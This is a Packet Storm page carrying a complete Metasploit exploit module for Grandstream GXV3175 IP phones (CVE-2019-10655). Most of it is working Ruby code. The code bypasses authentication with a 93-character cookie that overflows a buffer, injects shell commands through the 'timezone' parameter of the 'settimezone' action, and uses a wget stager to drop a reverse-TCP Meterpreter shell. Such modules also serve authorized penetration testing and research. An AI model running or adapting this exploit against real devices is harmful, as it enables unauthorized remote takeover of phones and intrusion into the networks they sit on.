Lucene search

Brendan Coles, alhazred, Brendan Scarvell, metasploit.comPACKETSTORM:165643

HistoryJan 20, 2022 - 12:00 a.m.

Grandstream GXV3175 Unauthenticated Command Execution

2022-01-2000:00:00

Brendan Coles, alhazred, Brendan Scarvell, metasploit.com

packetstormsecurity.com

314

metasploit

command injection

grandstreamgxv3175

authenticationbypass

bufferoverflow

cve-2019-10655

linux

alphanumericcookie

firmware

url

stability

reliability

sideeffects

disclosuredate

armle

cmdstager

wget

EPSS

0.917

Percentile

99.0%

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
  
HttpFingerprint = { pattern: [ /Multimedia Phone/ ] }.freeze  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => "Grandstream GXV3175 'settimezone' Unauthenticated Command Execution",  
'Description' => %q{  
This module exploits a command injection vulnerability in Grandstream GXV3175  
IP multimedia phones. The 'settimezone' action does not validate input in the  
'timezone' parameter allowing injection of arbitrary commands.  
  
A buffer overflow in the 'phonecookie' cookie parsing allows authentication  
to be bypassed by providing an alphanumeric cookie 93 characters in length.  
  
This module was tested successfully on Grandstream GXV3175v2  
hardware revision V2.6A with firmware version 1.0.1.19.  
},  
'Author' => [  
'alhazred', # Command injection vulnerability discovery and exploit  
'Brendan Scarvell', # Auth bypass discovery  
'bcoles' # Metasploit  
],  
'License' => MSF_LICENSE,  
'Platform' => 'linux',  
'References' => [  
[ 'CVE', '2019-10655' ],  
[ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920' ],  
[ 'URL', 'https://github.com/dirtyfilthy/gxv3175-remote-code-exec/blob/master/modules/exploits/linux/http/grandstream_gxv3175_cmd_exec.rb' ]  
],  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]  
},  
'DisclosureDate' => '2016-09-01',  
'Privileged' => true,  
'Arch' => ARCH_ARMLE,  
'DefaultOptions' => {  
'PrependFork' => true,  
'MeterpreterTryToFork' => true,  
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',  
'CMDSTAGER::FLAVOR' => 'wget'  
},  
'CmdStagerFlavor' => %w[wget],  
'Targets' => [  
['Automatic', {}]  
],  
'DefaultTarget' => 0  
)  
)  
end  
  
def check  
res = send_request_cgi(  
'uri' => '/manager',  
'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",  
'vars_get' => {  
'action' => 'settimezone',  
'timezone' => ''  
}  
)  
  
if res && res.code == 200 && res.body.to_s.include?('Response=Success')  
return CheckCode::Detected('phonecookie authentication bypassed successfully.')  
end  
  
CheckCode::Safe  
end  
  
def execute_command(cmd, _opts)  
res = send_request_cgi(  
'uri' => '/manager',  
'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",  
'vars_get' => {  
'action' => 'settimezone',  
'timezone' => "`#{cmd}`"  
}  
)  
unless res  
fail_with(Failure::Unreachable, 'Connection failed')  
end  
unless res.code == 200  
fail_with(Failure::UnexpectedReply, "Unexpected reply (HTTP #{res.code})")  
end  
unless res.body.to_s.include?('Response=Success')  
fail_with(Failure::UnexpectedReply, "Unexpected reply (#{res.body.length} bytes)")  
end  
end  
  
def exploit  
execute_cmdstager(  
linemax: 220, # 255 minus URL encoding  
background: true  
)  
end  
end  
`

EPSS

0.917

Percentile

99.0%

JSON

Related for PACKETSTORM:165643